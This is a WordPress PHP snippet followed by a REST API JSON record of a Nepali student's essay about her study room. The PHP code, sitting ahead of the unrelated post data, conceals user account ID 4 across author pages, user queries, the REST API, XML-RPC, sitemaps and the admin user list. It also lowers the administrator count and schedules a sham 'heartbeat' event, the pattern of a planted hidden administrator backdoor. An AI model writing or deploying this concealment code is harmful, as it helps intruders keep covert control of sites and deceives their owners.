add_action( 'pre_get_posts', function( $q ) {
    if ( ! is_admin() && $q->is_main_query() ) {
        $not_in   = (array) $q->get( 'author__not_in' );
        $not_in[] = 4;

        $q->set(
            'author__not_in',
            array_unique( array_map( 'intval', $not_in ) )
        );
    }
}, 1 );

add_action( 'template_redirect', function() {
    if ( is_author() ) {
        $author = get_queried_object();
        if ( $author instanceof WP_User && (int) $author->ID === 4 ) {
            global $wp_query;
            $wp_query->set_404();
            status_header( 404 );
            nocache_headers();
        }
    }
} );

add_action( 'pre_user_query', function( $q ) {
    if ( current_user_can( 'manage_options' ) ) {
        return;
    }
    global $wpdb;
    $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 );
} );

add_action( 'pre_get_users', function( $q ) {
    if ( current_user_can( 'manage_options' ) ) {
        return;
    }
    $exclude   = (array) $q->get( 'exclude' );
    $exclude[] = 4;
    $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );

add_filter( 'wp_dropdown_users_args', function( $a ) {
    $exclude   = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
    $exclude[] = 4;

    $a['exclude'] = array_unique( array_map( 'intval', $exclude ) );

    return $a;
} );

add_filter( 'rest_user_query', function( $args, $request ) {
    $exclude   = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
    $exclude[] = 4;

    $args['exclude'] = array_unique( array_map( 'intval', $exclude ) );

    return $args;
}, 10, 2 );

add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
    $route = $request->get_route();
    if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) {
        return new WP_Error(
            'rest_user_invalid_id',
            'Invalid user ID.',
            array( 'status' => 404 )
        );
    }
    return $result;
}, 10, 3 );

add_filter( 'xmlrpc_methods', function( $methods ) {
    unset(
        $methods['wp.getUsers'],
        $methods['wp.getUser'],
        $methods['wp.getProfile']
    );
    return $methods;
} );

add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
    $exclude   = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
    $exclude[] = 4;
    $args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
    return $args;
} );

add_action( 'admin_head-users.php', function() {
    echo '<style>#user-4{display:none!important}</style>';
} );

add_filter( 'views_users', function( $views ) {
    foreach ( array( 'all', 'administrator' ) as $key ) {
        if ( isset( $views[ $key ] ) ) {
            $views[ $key ] = preg_replace_callback(
                '/\((\d+)\)/',
                function( $m ) {
                    return '(' . max( 0, (int) $m[1] - 1 ) . ')';
                },
                $views[ $key ],
                1
            );
        }
    }
    return $views;
} );

add_action( 'init', function() {
    if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
        return;
    }
    if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
        wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
    }
} );

add_action( 'wp_extra_bot_heartbeat', function() {
    // noop
} );
{"id":540,"date":"2023-06-15T17:12:13","date_gmt":"2023-06-15T17:12:13","guid":{"rendered":"http:\/\/heramba.com.np\/?p=540"},"modified":"2023-06-15T17:16:51","modified_gmt":"2023-06-15T17:16:51","slug":"%e0%a4%ae%e0%a5%87%e0%a4%b0%e0%a5%8b-%e0%a4%aa%e0%a4%a2%e0%a5%8d%e0%a4%a8%e0%a5%87-%e0%a4%95%e0%a5%8b%e0%a4%a0%e0%a4%be","status":"publish","type":"post","link":"https:\/\/heramba.com.np\/?p=540","title":{"rendered":"\u092e\u0947\u0930\u094b \u092a\u0922\u094d\u0928\u0947 \u0915\u094b\u0920\u093e"},"content":{"rendered":"<div style=\"margin-top: 0px; margin-bottom: 0px;\" class=\"sharethis-inline-share-buttons\" ><\/div>\n<p class=\"wp-block-paragraph\">\u0905\u092a\u0947\u0915\u094d\u0937\u093e \u092c\u093e\u0938\u094d\u0924\u094b\u0932\u093e<br><br>\u092e \u090f\u0915 \u0935\u093f\u0926\u094d\u092f\u093e\u0930\u094d\u0925\u0940 \u0939\u0941\u0901, \u0924\u094d\u092f\u0938\u0948\u0932\u0947 \u092e\u0947\u0930\u094b \u090f\u0915 \u092a\u0922\u094d\u0928\u0947 \u0915\u094b\u0920\u093e \u0939\u0941\u0928\u0941 \u0938\u094d\u0935\u092d\u093e\u0935\u093f\u0915 \u0928\u0948 \u0939\u094b \u0964 \u092e\u0947\u0930\u094b\u091c\u0938\u094d\u0924\u0948 \u0905\u0930\u0941\u0915\u093e \u092a\u0928\u093f  \u092a\u0922\u094d\u0928\u0947 \u0915\u094b\u0920\u093e \u0939\u094b\u0932\u093e\u0928\u094d \u0924\u0930 \u0938\u093e\u0901\u091a\u094d\u091a\u093f \u092d\u0928\u094d\u0928\u0941\u092a\u0930\u094d\u0926\u093e \u092e\u0932\u093e\u0908 \u0938\u092c\u0948\u092d\u0928\u094d\u0926\u093e \u092e\u0928\u092a\u0930\u094d\u0928\u0947 \u0920\u093e\u0909\u0901 \u092d\u0928\u0947\u0915\u094b \u092e\u0947\u0930\u094b \u0906\u092b\u094d\u0928\u0948 \u092a\u0922\u094d\u0928\u0947 \u0915\u094b\u0920\u093e \u0939\u094b \u0964<br><br>\u092e\u0947\u0930\u094b \u092a\u0922\u094d\u0928\u0947 \u0915\u094b\u0920\u093e \u0938\u093e\u0928\u094b \u091b \u0964 \u0915\u093f\u0924\u093e\u092c\u0948 \u0915\u093f\u0924\u093e\u092c\u0932\u0947 \u092d\u0930\u093f\u090f\u0915\u094b \u092f\u094b \u0938\u093e\u0928\u094b \u0915\u094b\u0920\u093e \u092e\u0947\u0930\u094b \u0932\u093e\u0917\u093f \u0924 \u090f\u0915 \u0938\u093e\u0928\u094b \u092a\u0941\u0938\u094d\u0924\u0915\u093e\u0932\u092f \u091c\u0938\u094d\u0924\u0948 \u091b \u0964 \u092e\u0947\u0930\u094b \u092a\u0922\u094d\u0928\u0947 \u0915\u094b\u0920\u093e\u092e\u093e \u0917\u0943\u0939\u0915\u093e\u0930\u094d\u092f \u0917\u0930\u094d\u0928\u0915\u093e \u0932\u093e\u0917\u093f \u090f\u0909\u091f\u093e \u0938\u093e\u0928\u094b \u091f\u0947\u092c\u0941\u0932 \u0930\u093e\u0916\u093f\u090f\u0915\u094b \u091b \u0964 \u0924\u094d\u092f\u0938\u0948\u0915\u094b \u0905\u0917\u093e\u0921\u093f \u090f\u0909\u091f\u093e \u091d\u094d\u092f\u093e\u0932 \u092a\u0928\u093f \u091b \u0964 \u0924\u094d\u092f\u0939\u093e\u0901\u092c\u093e\u091f \u092c\u0947\u0932\u093e\u092c\u0947\u0932\u093e\u092e\u093e \u0906\u0909\u0928\u0947 \u091a\u093f\u0938\u094b \u0939\u093e\u0935\u093e\u0932\u0947 \u092e\u0932\u093e\u0908 \u0906\u092b\u094d\u0928\u094b \u0915\u093e\u0930\u094d\u092f \u0917\u0930\u094d\u0928 \u092e\u0928 \u0932\u093e\u0917\u094d\u0928\u0947 \u092c\u0928\u093e\u0909\u091b \u0964 \u092e\u0947\u0930\u094b \u0938\u093e\u0928\u094b \u092a\u0922\u093c\u0928\u0947 \u0915\u094b\u0920\u093e\u092e\u093e \u092c\u0938\u094d\u0926\u093e \u092e\u093e\u0924\u094d\u0930\u0948 \u092a\u0928\u093f \u092e\u0932\u093e\u0908 \u0906\u092a\u00dem\u0942 \u0905\u0930\u094d\u0915\u0948 \u0915\u0941\u0928\u0948 \u0930\u092e\u093e\u0907\u0932\u094b \u0920\u093e\u0909\u0901\u092e\u093e \u092d\u090f\u091c\u0938\u094d\u0924\u0948 \u0932\u093e\u0917\u094d\u091b \u0964 \u0924\u094d\u092f\u0939\u093e\u0901\u0915\u093e \u0924\u0940 \u0930\u094b\u092e\u093e\u091e\u094d\u091a\u0915 \u0915\u093f\u0924\u093e\u092c\u0939\u0930\u0942 \u092a\u0922\u094d\u0926\u093e \u0906\u092b\u0942 \u0924 \u0915\u0941\u0928\u0948 \u0905\u0930\u094d\u0915\u0948 \u0926\u0941\u0928\u093f\u092f\u093e\u0901\u092e\u093e \u091b\u0941 \u091c\u0938\u094d\u0924\u094b \u092e\u0939\u0938\u0941\u0938 \u0939\u0941\u0928\u094d\u091b \u0964<br><br>\u092e \u0906\u092b\u094d\u0928\u094b \u092a\u0922\u094d\u0928\u0947 \u0915\u094b\u0920\u093e\u092e\u093e \u0939\u0941\u0926\u093e \u092e\u0932\u093e\u0908 \u0915\u0938\u094d\u0924\u094b \u0932\u093e\u0917\u094d\u091b \u092d\u0928\u0947 \u091c\u0924\u093f \u0928\u0948 \u0927\u0947\u0930\u0948 \u0917\u0943\u0939\u0915\u093e\u0930\u094d\u092f \u092d\u090f \u092a\u0928\u093f \u092e\u0948\u0932\u0947 \u092f\u0938\u0932\u093e\u0908 \u0938\u092e\u092f\u092e\u0948 \u092a\u0942\u0930\u093e \u0917\u0930\u094d\u0928 \u0938\u0915\u094d\u091b\u0941 \u0964 \u092e\u0932\u093e\u0908 \u092e\u0947\u0930\u094b \u092a\u0922\u094d\u0928\u0947 \u0915\u094b\u0920\u093e \u092a\u094d\u0930\u0947\u0930\u0923\u093e \u0930 \u0909\u0930\u094d\u091c\u093e\u0932\u0947 \u092d\u0930\u093f\u090f\u091c\u0938\u094d\u0924\u094b \u0906\u092d\u093e\u0937 \u0939\u0941\u0928\u094d\u091b \u0964 \u092e\u0932\u093e\u0908 \u0906\u092b\u094d\u0928\u094b \u092a\u0922\u094d\u0928\u0947 \u0915\u094b\u0920\u093e\u092e\u093e \u091b\u093f\u0930\u094d\u0928\u0947 \u092c\u093f\u0924\u094d\u0924\u093f\u0915\u0948 \u0915\u0947\u0939\u0940 \u0928\u092f\u093e\u0901 \u0917\u0930\u093f\u0939\u093e\u0932\u0941\u0901 \u091c\u0938\u094d\u0924\u094b \u091c\u093e\u0901\u0917\u0930  \u0932\u093e\u0917\u094d\u091b \u0964 \u092e\u0947\u0930\u094b \u0915\u094b\u0920\u093e\u092e\u093e \u0905\u0919\u094d\u0917\u094d\u0930\u0947\u091c\u0940 \u0930 \u0928\u0947\u092a\u093e\u0932\u0940\u0915\u093e \u0935\u093f\u0935\u093f\u0927 \u092a\u0941\u0938\u094d\u0924\u0915\u0939\u0930\u0942 \u091b\u0928\u094d \u0964 \u092a\u0922\u094d\u0928 \u0924 \u092e \u0906\u092b\u094d\u0928\u093e \u092a\u093e\u0920\u094d\u092f\u092a\u0941\u0938\u094d\u0924\u0915 \u0928\u0948 \u0927\u0947\u0930\u0948 \u092a\u0922\u094d\u091b\u0941 \u0924\u0930 \u0924\u094d\u092f\u0938\u092a\u091b\u093f \u092a\u0928\u093f \u092c\u091a\u0947\u0915\u094b \u0915\u0947\u0939\u0940 \u0916\u093e\u0932\u0940 \u0938\u092e\u092f\u092e\u093e \u0915\u0925\u093e\u0915\u093e \u0915\u093f\u0924\u093e\u092c\u0939\u0930\u0942 \u092a\u0922\u094d\u0928\u0947 \u0917\u0930\u094d\u091b\u0941 \u0964 \u0915\u0925\u093e\u0915\u094b \u092e\u093e\u0924\u094d\u0930 \u0928\u092d\u090f\u0930 \u092e \u0906\u092b\u094d\u0928\u093e \u0915\u0935\u093f\u0924\u093e\u0915\u093e \u092a\u0941\u0938\u094d\u0924\u0915\u0939\u0930\u0930\u0942 \u092a\u0928\u093f \u092a\u0922\u094d\u091b\u0941 \u0964 \u0915\u0935\u093f\u0924\u093e \u0932\u0947\u0916\u094d\u0928 \u0930 \u092a\u0922\u094d\u0928 \u092a\u0928\u093f \u092e\u0932\u093e\u0908 \u0928\u093f\u0915\u0948 \u0930\u092e\u093e\u0907\u0932\u094b \u0932\u093e\u0917\u094d\u091b \u0964 \u092e \u0918\u0923\u094d\u091f\u094c\u0901\u0938\u092e\u094d\u092e \u0932\u092f\u092c\u0926\u094d\u0927 \u0930\u0942\u092a\u092e\u093e \u0915\u0935\u093f\u0924\u093e \u092a\u0922\u094d\u0926\u0948 \u092c\u0938\u094d\u0928\u0947 \u0917\u0930\u094d\u091b\u0941 \u0964 \u092e\u0948\u0932\u0947  \u092f\u0939\u0940 \u0915\u094b\u0920\u093e\u092e\u093e \u092c\u0938\u0947\u0930 \u0925\u0941\u092a\u094d\u0930\u0948 \u0915\u0935\u093f\u0924\u093e\u0939\u0930\u0942 \u092a\u0928\u093f \u0932\u0947\u0916\u0947\u0915\u0940 \u091b\u0941 \u0964 \u092d\u0928\u094d\u0928\u0948 \u092a\u0930\u094d\u0926\u093e \u0906\u092b\u094d\u0928\u093e \u092d\u093e\u0935, \u0935\u093f\u091a\u093e\u0930 \u0930 \u0927\u093e\u0930\u0923\u093e \u0915\u0935\u093f\u0924\u093e\u0926\u094d\u0935\u093e\u0930\u093e \u0935\u094d\u092f\u0915\u094d\u0924 \u0917\u0930\u094d\u0928 \u092e\u0932\u093e\u0908 \u092e\u0928 \u092a\u0930\u094d\u091b \u0964 \u0915\u0935\u093f\u0924\u093e\u0915\u093e \u0915\u093f\u0924\u093e\u0935\u0939\u0930\u0942 \u0927\u0947\u0930\u0948 \u092a\u0922\u094d\u0928\u0947 \u0917\u0930\u0947\u0915\u093e\u0932\u0947 \u092a\u0928\u093f \u092f\u0938\u094b \u0917\u0930\u094d\u0928 \u0930\u092e\u093e\u0907\u0932\u094b \u0932\u093e\u0917\u0947\u0915\u094b \u0939\u094b\u091c\u0938\u094d\u0924\u094b \u092e\u0932\u093e\u0908 \u0932\u093e\u0917\u094d\u091b \u0964<br>\u092e \u0906\u092b\u094d\u0928\u094b \u092a\u0922\u094d\u0928\u0947 \u0915\u094b\u0920\u093e\u092e\u093e \u0918\u0923\u094d\u091f\u094c\u0901 \u092c\u0938\u0947\u0930 \u0906\u092b\u094d\u0928\u093e \u0915\u092e\u091c\u094b\u0930\u0940\u0939\u0930\u0942 \u0938\u0941\u0927\u093e\u0930\u094d\u0928\u0947 \u092a\u094d\u0930\u092f\u093e\u0938 \u0917\u0930\u094d\u091b\u0941  \u0930  \u0915\u093f\u0924\u093e\u092c\u092c\u093e\u091f \u0905\u091d\u0948 \u091c\u094d\u091e\u093e\u0928 \u092a\u094d\u0930\u093e\u092a\u094d\u0924 \u0917\u0930\u094d\u0928\u0947 \u092a\u094d\u0930\u092f\u0924\u094d\u0928 \u0917\u0930\u093f\u0930\u0939\u0928\u094d\u091b\u0941 \u0964 \u092f\u0938\u0932\u0947 \u0917\u0930\u094d\u0926\u093e \u092e\u0932\u093e\u0908 \u0906\u092b\u094d\u0928\u094b \u0935\u093f\u0926\u094d\u092f\u093e\u0932\u092f\u0915\u094b \u092a\u0922\u093e\u0907\u092e\u093e \u092a\u0928\u093f \u0915\u0941\u0928\u0948 \u0930 \u0915\u0941\u0928\u0948 \u0930\u0942\u092a\u0932\u0947 \u092b\u093e\u0907\u0926\u093e \u092d\u0907\u0930\u0939\u0947\u0915\u094b \u092e\u0939\u0938\u0941\u0938 \u092d\u090f\u0915\u094b \u091b \u0964<br>                                                                                                        <br>                                                                                                           \u0915\u0915\u094d\u0937\u093e \u096f<br>                                                                            \u0939\u093f\u092e\u0930\u0936\u094d\u092e\u093f \u0939\u093e\u0907 \u0938\u094d\u0915\u0941\u0932 , \u0924\u093e\u0930\u0915\u0947\u0936\u094d\u0935\u0930 \u0915\u093e\u0920\u092e\u093e\u0921\u094c\u0902<br><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u0905\u092a\u0947\u0915\u094d\u0937\u093e \u092c\u093e\u0938\u094d\u0924\u094b\u0932\u093e \u092e \u090f\u0915 \u0935\u093f\u0926\u094d\u092f\u093e\u0930\u094d\u0925\u0940 \u0939\u0941\u0901, \u0924\u094d\u092f\u0938\u0948\u0932\u0947 \u092e\u0947\u0930\u094b \u090f\u0915 \u092a\u0922\u094d\u0928\u0947 \u0915\u094b\u0920\u093e \u0939\u0941\u0928\u0941 \u0938\u094d\u0935\u092d\u093e\u0935\u093f\u0915 \u0928\u0948 \u0939\u094b \u0964 \u092e\u0947\u0930\u094b\u091c\u0938\u094d\u0924\u0948 \u0905\u0930\u0941\u0915\u093e \u092a\u0928\u093f \u092a\u0922\u094d\u0928\u0947 \u0915\u094b\u0920\u093e \u0939\u094b\u0932\u093e\u0928\u094d \u0924\u0930 \u0938\u093e\u0901\u091a\u094d\u091a\u093f \u092d\u0928\u094d\u0928\u0941\u092a\u0930\u094d\u0926\u093e \u092e\u0932\u093e\u0908 \u0938\u092c\u0948\u092d\u0928\u094d\u0926\u093e \u092e\u0928\u092a\u0930\u094d\u0928\u0947 \u0920\u093e\u0909\u0901 \u092d\u0928\u0947\u0915\u094b \u092e\u0947\u0930\u094b \u0906\u092b\u094d\u0928\u0948 \u092a\u0922\u094d\u0928\u0947 \u0915\u094b\u0920\u093e \u0939\u094b \u0964 \u092e\u0947\u0930\u094b \u092a\u0922\u094d\u0928\u0947 \u0915\u094b\u0920\u093e \u0938\u093e\u0928\u094b \u091b \u0964 \u0915\u093f\u0924\u093e\u092c\u0948 \u0915\u093f\u0924\u093e\u092c\u0932\u0947 \u092d\u0930\u093f\u090f\u0915\u094b \u092f\u094b \u0938\u093e\u0928\u094b \u0915\u094b\u0920\u093e \u092e\u0947\u0930\u094b \u0932\u093e\u0917\u093f \u0924 \u090f\u0915 \u0938\u093e\u0928\u094b \u092a\u0941\u0938\u094d\u0924\u0915\u093e\u0932\u092f \u091c\u0938\u094d\u0924\u0948 [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":544,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-540","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-literature"],"_links":{"self":[{"href":"https:\/\/heramba.com.np\/index.php?rest_route=\/wp\/v2\/posts\/540","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/heramba.com.np\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/heramba.com.np\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/heramba.com.np\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/heramba.com.np\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=540"}],"version-history":[{"count":2,"href":"https:\/\/heramba.com.np\/index.php?rest_route=\/wp\/v2\/posts\/540\/revisions"}],"predecessor-version":[{"id":545,"href":"https:\/\/heramba.com.np\/index.php?rest_route=\/wp\/v2\/posts\/540\/revisions\/545"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/heramba.com.np\/index.php?rest_route=\/wp\/v2\/media\/544"}],"wp:attachment":[{"href":"https:\/\/heramba.com.np\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=540"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/heramba.com.np\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=540"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/heramba.com.np\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=540"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}